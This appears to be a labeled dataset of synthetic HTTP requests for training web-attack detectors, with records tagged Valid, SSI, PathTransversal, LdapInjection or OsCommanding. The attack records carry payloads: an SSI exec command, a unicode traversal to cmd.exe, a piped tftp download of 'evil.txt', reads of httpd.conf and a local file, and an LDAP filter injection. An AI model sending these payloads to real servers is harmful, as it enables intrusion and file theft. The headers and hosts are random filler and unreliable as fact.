GET /a6/olethiucc9yoc8iss/yuhiso4o.jpg?ybnxgc=Yla7mf&wMOdoflopigrm55=2aHCyAjA&irM=ino+&w06eg=3 HTTP/1.1
Host: www.tcw6rn.cz:80
Connection: keep-alive
Accept: application/x-tar, audio/basic;q=0.1, text/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: tnse0-U;q=0.1
Cache-Control: no-transform
Client-ip: 185.221.92.205
Cookie: heeooWis4eItr=36526
Cookie2: $Version="35"
Date: Sat, 21 May 05 17:37:28 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: seop=r3jomss
From: 06wy8l@mtedC.de
If-Modified-Since: Sat, 08 Aug 09 11:21:55 GMT
If-Unmodified-Since: Wed, 09 Mar 05 10:24:42 UTC
If-Match: "1jsuZdoQptlVQzKN"
If-None-Match: *
If-Range: Thu, 11 Feb 10 11:17:27 CET
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Susn wVBdeE=neSgPhy
Authorization: NTLM YmJudGR0bGVhd1lpb3dpaDh0YjFzTHVzZWd1ZWhScHRsOHNuYW4=
Range: 660-,3-
Referer: /5pC4nuuh/r8tren/bixup.tiff
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: es4jrqmwqI http://www.unpgt.biz
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 794x6621
Via: 3.8 www.hyNEya.gif:91669, oNtkN/6.4 130.152.135.142
Transfer-Encoding: compress
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 907 95.3.6.240 "U0ssne4rnc" "Mon, 23 Jan 06 20:28:05 GMT"
X-Forwarded-For: 121.21.166.116
X-Serial-Number: 189697977036477
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27622
Start - Id: 40057
class: SSI
GET /tUVBFjBBQ0-9c.gif?6RY6=6ftp6weautoexecnxubodylra&XEZWhG=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fls++-l+%2Fhome%2Fobd9n%2FteWn6sowd%22+++--%3E&ihwiremsCPTecIR=5691&Decldi7ecdabed=415 HTTP/1.0
Host: www.8yd8xerip.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ptEe-aayeeia;q=0.2, jl3-onyefc5a;q=0.3
Cache-Control: max-stale
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="57"
Date: Sun, 02 May 04 02:20:22 GMT
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: eL2Sfnt@tHEerioe.de
If-Modified-Since: Wed, 18 Feb 09 16:32:03 CET
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 173
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: c6smia gndeone=etbon7nf
Range: 271-,17364-
Referer: /bltmdna/szeR/tE65.php
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: Mozilla/6.6 (compatible; MSIE 1.7; Open BSD i586; peghnnveoa; bRdait8; rcAi)
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: FTP/7.2 www.qspe.jpg, FTP/7.1 www.tuee9.jpg, HTTP/8.9 www.eeiga.png
Transfer-Encoding: deflate
Upgrade: biaEr/9.5, oeSlsn/3.8, eylE/7.1
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40057
Start - Id: 46186
class: PathTransversal
GET /l65rJfnd8waxM/aiurnsci8aepTsiyIurt/l6tYfLpTKGxg.sh?vNra=inlpototincludei&nenTaae=d8Y&qTdwhaobeaIcecc=tahtaccesee8co%3EItt&hai6dnmE=sh&deeo=%2Fetc%2Fhttpd%2Fhttpd.conf&dyOnaevon5xpmde=42732861&SinsAh=nnt HTTP/1.1
Host: www.nFtte.gov
Connection: ouktLA
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=731
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Fri, 01 May 09 09:41:37 UTC
ETag: "xWLQ0uIbouzuITiED"
Expect: 100-continue
From: Hue2dlm3@crhocb.gov
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Thu, 28 Oct 04 02:25:45 UTC
If-Match: "NEpaVxwPI-12jrfUL6"
If-None-Match: *
If-Range: Sat, 21 Feb 09 23:06:31 UTC
Max-Forwards: 34
MIME-Version: 9.2
Pragma: jisne=tnsnrdea
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: NTLM dTBVYnQzcnRvNkp4YXFoY29lYWllc2RhaWF4cFB4aGVzbWRkcm5zMmhzaWZsaGhk
Range: -423
Referer: http://Alghels.be/inaditZ.gif
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.3 (Windows; U; WinNT 5.0; rn-3K; rv:5.1.4) Gecko/22235078
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46186
Start - Id: 36961
class: LdapInjection
GET /aseapircg8ect/p.SvN2jCjV6/A5.gfPQn.Dinput9-LN/snehkoetoteejthiaa/rnher5o/Rerftns/iPn6Sx4/irBXfngcvDqjRXD/nYklCtLYurPyg/cfqpCHNJ8R_h.Dp4cdY8/p7R.zeD8BGdrek6lpVmV/bFAxGLZJ.dll?FK89qM=0013%29%28%26%28objectClass%3Dtoch%29%28%7C%28sn+%3D++++eehr%29%28cn%3Dmx++J*%29%29 HTTP/1.0
Host: www.xoSte0n.be
Connection: keep-alive
Accept: text/*;q=0.6, audio/x-wav, image/jpeg;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: d1-b0a;q=0.8
Cache-Control: no-store
Client-ip: 113.131.200.174
Cookie: rsl9tn=eedlae4an;y4GB=ht|u
Cookie2: $Version="041"
Date: Fri, 03 Oct 08 04:55:34 CET
ETag: W/"0hNPjWgcQZJH5il"
Expect: erhfrxn=tA8teDd;dhrutcnn
From: ooeh@nqieoausen.gov
If-Unmodified-Since: Wed, 16 Dec 09 01:32:15 UTC
If-Match: *
If-Range: *
Max-Forwards: 92
Pragma: w1eaee=o3vel
Authorization: Basic dXFzZWxoZjpkaWlzU2Vt
Range: 84-,-422477,1197-5319
Referer: /ocae4e/eonJi/fa2nso/wusaSeoh.avi
TE: deflate;q=0.7
Trailer: Range
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 4.0; re-ee; rv:0.3.5) Gecko/92534504
UA-CPU: Sparc
UA-Disp: 553,0581,32
UA-Pixels: 8538x2200
Upgrade: voikit/1.2
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36961
Start - Id: 44084
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.aaitenldlp.st:2961
Connection: keep-alive
Accept: image/gif;q=0.8, audio/*;q=0.5
Accept-Charset: windows-1257, iso-2022-jp, iso-2022-jp, iso-10646-ucs-2, iso-8859-2
Accept-Encoding: *
Accept-Language: g-mkgbVEru;q=0.8
Cache-Control: max-age=3842
Client-ip: 182.213.184.73
Cookie: dI2osteaqagde=omavrtjUg;rtlae=pqB5fx2I.j4p;iYLznl@P5GnX=8126;fah7risrf4htp=0139
Cookie2: $Version="4"
Date: Fri, 01 Jun 07 16:15:38 GMT
ETag: W/".Z.c4.xeA3kSTWv"
Expect: ugrhejx
From: ixam@eaec.uk
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Wed, 28 Oct 09 11:22:25 CET
If-Match: "KUoJ4vK7fOF8Y3B"
If-None-Match: *
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 1319
MIME-Version: 3.7
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: /vriheayy.jpeg
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: Mozilla/2.5 (compatible; MSIE 8.8; Win 9x; ua6ciryme)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 044x211
Via: w2he/7.4 www.ohoaiall.png, tatd/2.3 www.lrtNeuo.htm
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44084
Start - Id: 10980
class: Valid
GET /2whninrrsea4teco3on/XzXcsamnYNxq/tMr/eRJD8ruV/vN1CnullBphG3usrn/ualecstrniopat/iDq/gKC8oA_GTf.css?9ct7u8eeddq7hE=39&lExWFFJ-mochab=eeber3dsflcoar&eTAht9tsI=n5A1vkK&hs=everts%3Cosvibrwinntu&ndoajawkR9ilhm3=nchnnds%3DcElessi&IRandoWy7X=15&ti8fyyesea=+nk&yarsnrsc=87&eTiwtfls=fqn-aq&sya=52424732&plo=Putj8Pbg%7Eu&8Nf=16427&tefrcresb6g2eeg=annzhL56rte HTTP/1.1
Host: www.HutN.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 109.111.56.148
Cookie: dSnph-copyDcNcWg=lvarpoO od;eqae9xpetd=os'-b
Cookie2: $Version="75"
Date: Fri, 22 Dec 06 11:09:24 CET
ETag: "l3Um3FuC_D3@Yj0mc"
Expect: tx0nAsr=eNpiep
From: e5rsien@oece.be
If-Modified-Since: Tue, 30 May 06 13:34:08 GMT
If-Unmodified-Since: Sat, 20 Mar 10 04:30:02 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Sep 05 24:24:48 GMT
Max-Forwards: 0288
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM Z2F6Y2dudGFpcm9Nc3lpb3lkZWFUYnBuaWUzb2lkbnNzb2V2YWFsYQ==
Range: 415535-51
Referer: /tlslE8/fnleyu/l2eme.htm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.1 (X11; U; SunOS sun4u 6.8; k3-se; rv:4.3.9) Gecko/76557073
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 124x705
Via: 2.1 www.onteNse.css, HTTP/8.1 www.do2se.jpg:684, FTP/3.8 235.2.210.16
Transfer-Encoding: deflate
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 502 www.a6ETf3aa.jpeg "ihitc" "Mon, 05 Nov 07 14:03:56 UTC"
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10980
Start - Id: 11952
class: Valid
GET /ieonmitEacedueeaqf4/eosmof0iiaxTeeh/vIr.btWYP_e/2qconnectX@c2DBDyf4s/xF-TSqYPo.aspx?dlallvhhbjeu6U=zautoexeclnSzCfilseupdateS HTTP/1.0
Host: 179.146.184.57:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, compress;q=0.5, deflate, gzip, compress;q=0.7
Accept-Language: *;q=0.8
Cache-Control: max-stale=67
Client-ip: 202.180.82.94
Cookie: bae7emiea7aost1=Xee;runi=086;dorrioyEsmms=d~emochaa;nSjieO=l6V5e;lehAmt1otumtSgt=au;nehnnsasolthh=hns
Cookie2: $Version="6"
Date: Thu, 22 Jan 09 01:48:43 UTC
ETag: W/"KZ3ARv6Pn0SB29nHct4"
Expect: 100-continue
From: RoReztii@imT2.gov
If-Modified-Since: Thu, 01 Oct 09 13:57:28 UTC
If-Unmodified-Since: Fri, 15 Oct 04 21:26:39 GMT
If-Match: "sbB_RTsh_s4q8cVz"
If-None-Match: *
If-Range: "Wyl8pYyo1RylgKcR"
Max-Forwards: 482
MIME-Version: 3.1
Pragma: alson8z=giyE3
Proxy-Authorization: Basic b1NpYm5sbjpmZXJuZWk=
Authorization: thsn6 alanr=tngaE8tf
Range: 69-9009
Referer: http://hnttnsi.net/fatt7SN/Vt8o/ggAt/iretzv.wav
TE: trailers
Trailer: If-Modified-Since
User-Agent: lssrodrt (a7nQytCMtE; aaWNJIAhK4; 7S.zL6)
UA-CPU: PowerPC
UA-Disp: 664,211,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: 4.4 16.63.98.26, loNovn/0.6 53.165.58.161:062
Transfer-Encoding: gzip
Upgrade: wusbau/0.4, ERt/9.6, oDsD/5.0, 4yss2/3.5, rhod/5.2
Warning: 781 www.doaiO5.html:2 "eedAwnx0wtoeziimEee" "Wed, 27 Jun 07 16:44:22 UTC"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 7861742222563
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11952
Start - Id: 44593
class: OsCommanding
GET /mtuS@3A/0veltedtnsp/oJm/nhyag_s.lp4T6kGGR.html?yotieshomkY=t%40+%7C%5B&heeRdas=6cits9iotr&Rsea1ed9n6h3kno=%3Fa%5D&ofayuNoa3pel=%25Incnph-h&dsOhpoee7=3e&lerhn5if=q&ettsttsu=1775&qwtciulYpI=ma0EFimg&Eet1Xa=ikPmelzoe&hnco5smw=93.148.84.158++%7C+tftp+192.168.10.33+evil.txt&qet2=s&TRDS_cmdMRopenx=41O34H9H&nzsSoSala=13 HTTP/1.0
Host: www.4mfin5.uk
Connection: close
Accept: image/png, application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 183.12.198.133
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="5"
Date: Mon, 22 Aug 05 12:23:38 GMT
ETag: W/"Dcm4bzg5Wz@HWx9.n"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Tue, 04 Nov 08 06:34:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2730
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic ZGhFeXlpYWw6ZXJ0aXk=
Range: -2578
Referer: http://www.STlsss.cz/nrsa2xls.jsp
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.4 (compatible; Konqueror/7.5; SunOS sun4u; ee7sfsmm2; tNtcmeT; aalo37kqe)
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: demte/2.5, f0ful/4.1, zhrgt/8.4, yh7h/1.2
Warning: 383 www.Mece.jpeg:13 "gitirtep1tr" "Mon, 15 Feb 10 03:00:27 CET"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44593
Start - Id: 27545
class: Valid
GET /tWpeqakshsTdNetnui3/w5BdPnOC/dUnrw6htfsoirtod/3m6VW4oBa_W/ratiwFp/a0SR2bfeFu68/gbgsoundwp-2winput_x8mboot.iniI/2phsxe/qnB1-DDRxP@vg.jpg?khqiaeecShg=il&lex5e0odl=4eosr&tahnAhtsretAsXs=teeT18en6uvhvosrn&eAdiid4eamawrhh=mccp%3Fse&Iqess=lnshAyud&1PnodekgT=liwtmnartgsfh&dfcsl1glph=i9rtsAtsS&9X9YEYjwp--=7if%25e&vRjsorpnnokdz1c=hmbdM.mK&hGBneefueysmm=%29ee%5Boincludesreoe2&aoHpl0=9EkWlZoy_&lwcotruTmudu=vphpnnheoFo8Daftpw&re1dn=Yt%3Aneeataise&UasaiTneUn8i=i.mu-&tnphkelnage=8957 HTTP/1.1
Host: www.bhauuevorz.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-tw, gb2312;q=0.9, iso-8859-7;q=0.8, windows-1250, iso-8859-9
Accept-Encoding: compress, compress;q=0.2, compress
Accept-Language: O-aher, egg-z8o
Cache-Control: min-fresh=45
Client-ip: 40.149.99.104
Cookie: GxXVCK220admin.q=988448;Y5uW=:a|oeiorn7tr9;yeq8r0c=ottsam3;O2nhincludetelnet=8765496
Cookie2: $Version="703"
Date: Fri, 12 Mar 04 15:27:48 GMT
ETag: W/"1oItMmry79T_7jIs8V1Y"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Sat, 13 May 06 03:45:50 CET
If-Match: "Pa5nAYDOn_VGsJ@Po"
If-None-Match: *
If-Range: *
Max-Forwards: 2596
MIME-Version: 4.1
Pragma: taako4hr=ftaje
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dWxvZXI6emVoQWRy
Range: -57147,586891-,-6
Referer: /csvjHmc.ace
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 1.8; cc-sf; rv:2.3.1) Gecko/82475593
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 1.8 www.2Wrxo.html:9, FTP/3.4 www.htfs.html:66190
Transfer-Encoding: compress
Upgrade: p9oeKS/3.3, hrTbcn/5.9, it5rl/2.1
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27545
Start - Id: 22223
class: Valid
GET /uwunsmasorkttactod/elebT.cfm?YQ-r@psLUi=6532&r88s=eWb0qHuRpJaP&tasoittcurica=no61&at=etIshz&dtatevohg0mao=hdelete&tcuTrr=nJjXM1Rc HTTP/1.1
Host: 9.109.173.183
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.6, x-mac-arabic;q=0.9, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=901
Client-ip: 250.180.79.172
Cookie: X-ftpN23=snttItd;AXoY=n6tteoBn;usdzrnba3timee=qo+y;tr4hq=e;Xi
Cookie2: $Version="16"
Date: Sun, 20 Sep 09 22:46:50 CET
ETag: "8_cZba7QO@gqptQiG9E"
Expect: olGse=spiiro
From: EczsehBn@a2tvcp2i.gov
If-Modified-Since: Tue, 03 Aug 04 17:36:31 GMT
If-Unmodified-Since: Sun, 02 Sep 07 03:43:21 UTC
If-Match: "hxLSyz05H6LhVdE"
If-None-Match: "1tdfU1uTKqLmFRRvKuL"
If-Range: *
Max-Forwards: 7750
MIME-Version: 3.2
Pragma: pkiiduml=d
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: NTLM aEhkUmVlbG5pajhzbW0wYXNlNWhEa2Vpb2VlZXM0Y0thaXQ=
Range: -09
Referer: /Fkuf/niatnttd/uoHusssA.avi
TE: trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 8.0; ca-cy; rv:6.0.2) Gecko/69070064
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9834x5645
Via: 8.7 www.sEemt.jpeg, HTTP/2.1 223.217.169.19
Transfer-Encoding: compress
Upgrade: Mt2enn/1.0
Warning: 706 www.iiOa5uY.htm "dlo7est8pohpffoz" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22223
Start - Id: 23437
class: Valid
GET /oehjruiati/qH/sj.exe? HTTP/1.0
Host: www.iutoqaxax.cz
Connection: keep-alive
Accept: video/*;q=0.4, video/mpeg;q=0.8
Accept-Charset: x-mac-chinesetrad, x-mac-icelandic, iso-10646-ucs-2, euc-cn, iso-8859-8;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: i9xsx-dI6;q=0.8, ion-nvbhrnce
Cache-Control: max-stale
Client-ip: 116.67.243.172
Cookie: wohp=0gzrausftHns;eiNciotioeA2=iG.
Cookie2: $Version="4"
Date: Mon, 31 Aug 09 10:14:19 CET
ETag: "X0csyXE8WEvGg_zlTL"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Sun, 03 Feb 08 22:24:19 GMT
If-Unmodified-Since: Thu, 02 Mar 06 03:22:50 UTC
If-Match: *
If-None-Match: "o41FrYv7E2Zw8cnTm7H"
If-Range: *
Max-Forwards: 2277
MIME-Version: 3.9
Pragma: eB='t'
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM ZUhhb3JoaXZ4SWVIZWVhc29heUh4b2Nlb2FtdHJlZWNXZA==
Range: 47922-,-4850
Referer: http://www.opnk.com/zsVtooD/ookt/ioe7ePdt/hstt/tzrs.mpeg
TE: chunked
Trailer: Via
User-Agent: Mozilla/8.8 (compatible; Konqueror/1.9; SunOS sun4u; tOOaxay0e; haitcea)
UA-CPU: PowerPC
UA-Disp: 188,8942,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 247.130.186.48
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23437
Start - Id: 44766
class: PathTransversal
GET /ahtlqmmdi8inns/atohyAiiyna0rc/jrsIksetlbdD/aR/yRs0dctmpEMCS/dV0DJ7px/greaeekcoWrgnain/prZ5ZX3bMDDU0/4uCK.htm?tToreFcAs6tal=90285&sdofmu3faen=doc%28+file%3A%2F%2F%2Fc%3A%2Fsgoi%2FiisOese.xml%29&vahhesp0Txqat6t=50347&nfp=ruhd+s HTTP/1.0
Host: 143.185.176.42
Connection: tian
Accept: audio/x-wav;q=0.1, text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.6, compress;q=0.6
Accept-Language: aewtehl-sq0m, 8h-Dgih, p2ghrts-hxh;q=0.4, geqMm-oess;q=0.4, osv-elBms
Cache-Control: only-if-cached
Client-ip: 22.201.213.145
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="28"
Date: Mon, 02 Jun 08 20:49:24 CET
ETag: W/"asmYO.K.bOUh@aF"
Expect: ammm
From: Strga@kmekoca.fr
If-Modified-Since: Sat, 27 Dec 08 07:20:09 CET
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 9
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: NTLM ZGlveUl0bXRJbG9zZDlpYWRuZ0l1c3Rlbm13Y0V6RXNoc2lsZGVycG5vbUU=
Range: 6578-336232,-258470,45228-5909
Referer: http://www.wmsDMt.de/bsoE5i.pdf
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: 1aUtapf/7.2.3
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: get/0.4, rgtf/4.9, Eac8/3.7, zbsjne/6.4, erdN/2.3
Warning: 075 226.115.253.85 "3EIasrapsapthhse" "Sun, 24 Oct 04 16:27:54 CET"
X-Forwarded-For: 177.203.165.156
X-Serial-Number: 29099
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44766
Start - Id: 19411
class: Valid
GET /eWEYBvnuBtA/i3/e9K0/muhtehzmtprttd/aaoqe4u9eoi0/rtk6KIBXbLNDcJSU/reH/daScsn8orp/sz@Q1XgiCF.k/acRl55s/mrtuMBEetas0iz2ebj/iXa9doS_8qLBOSQVF.php? HTTP/1.0
Host: 184.31.222.12
Connection: keep-alive
Accept: text/*, text/html;q=0.1, text/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 171.196.246.32
Cookie: .xrmFfDN=595613;8hg5eyos=ie+;Gq09insert9m=?oee;pn0peter=sw;i5a=3tdrb o;qUPK1YxtermxmlJVxD=27125
Cookie2: $Version="443"
Date: Tue, 20 Jan 04 17:27:09 UTC
ETag: "4fBtkGnN1iC7-i7nSOa"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sun, 21 Nov 04 13:18:52 CET
If-Unmodified-Since: Sun, 18 Jan 04 14:52:44 GMT
If-Match: *
If-None-Match: *
If-Range: "ZIy1-ItIGO9EtetC3."
Max-Forwards: 9
MIME-Version: 8.3
Pragma: eea=tge3
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: qolhw rtei=entcei
Range: -6815,05-
Referer: http://www.et30fee.uk/8uyreo/eer0e8s.sh
TE: chunked
Trailer: Expect
User-Agent: iyhvo0os
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: 2.2 98.217.253.217
Transfer-Encoding: Oddi
Upgrade: 3tDr/0.3, octa/6.4
Warning: 004 www.i7gBe.tiff "ie1rvnye5ht" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 55136594
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19411
Start - Id: 4329
class: Valid
PUT /hZAkOQxuzK/uioa/tK8_3jEZMx-vPBK/FzER9kB/o0IPLcLU50CQASccshT/slpssbhels22iaemihh/qpacem.htm? HTTP/1.1
Content-Length: 93
Content-Language: ntlo5fy
Content-Encoding: gzip
Content-Location: http://www.raif9vee.gov/auaexkel.js
Content-MD5: cHE4b0hjZTV0bnJ3M2F0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: 16.175.146.184
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-8-i, x-mac-roman, x-mac-icelandic;q=0.9
Accept-Encoding: identity, compress;q=0.7
Accept-Language: 1Xee-2a, ju-e1T
Cache-Control: no-store
Client-ip: 67.250.58.132
Cookie: a4pcy1e7Sdh=< enu rt8$knpihceh;weguneahuj5e=03367;Aatmernesarh=275;-0bO4p8d20include=rh;6nfontofoE7=w6-VkrAsT
Cookie2: $Version="5"
Date: Fri, 13 Mar 09 18:16:20 UTC
ETag: W/"mZAukJyOO3GuhH1KuBe"
Expect: 100-continue
From: 5soaa@eElhadti.fr
If-Modified-Since: Tue, 13 Oct 09 18:50:24 CET
If-Unmodified-Since: Sat, 21 Jul 07 11:58:19 CET
If-Match: *
If-None-Match: *
If-Range: "JS5yfkgwivBD_E_qH8Eu"
Max-Forwards: 6137
MIME-Version: 1.7
Pragma: eewgic='sn'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZUh1YWVzY1RMZzN0b3pyOWlhZGZUZWFEZG9lbHVOZWJ0Y3R3ZThuZXBuOHNubzY=
Range: -6985,-5545,-0
Referer: /ise9e/ieesend.exe
TE: trailers,trailers,chunked
Trailer: Trailer
User-Agent: 6dpcNm (l90z3gn; w0Jln6e1M1; hDWFSD7hE; efNVAaH)
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8501x1867
Via: 2.9 www.tlgrer.html, HTTP/9.6 59.52.53.215:53344, 8.4 www.helyn.css:77
Transfer-Encoding: gzip
Upgrade: esgn/6.8, ei1l/5.1, redat/5.0, 10g/8.4
Warning: 980 www.Rrmnetut.css:6 "sOlpsziur" "Wed, 25 Mar 09 01:43:09 GMT"
X-Forwarded-For: 184.207.120.162
X-Serial-Number: 936770860
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

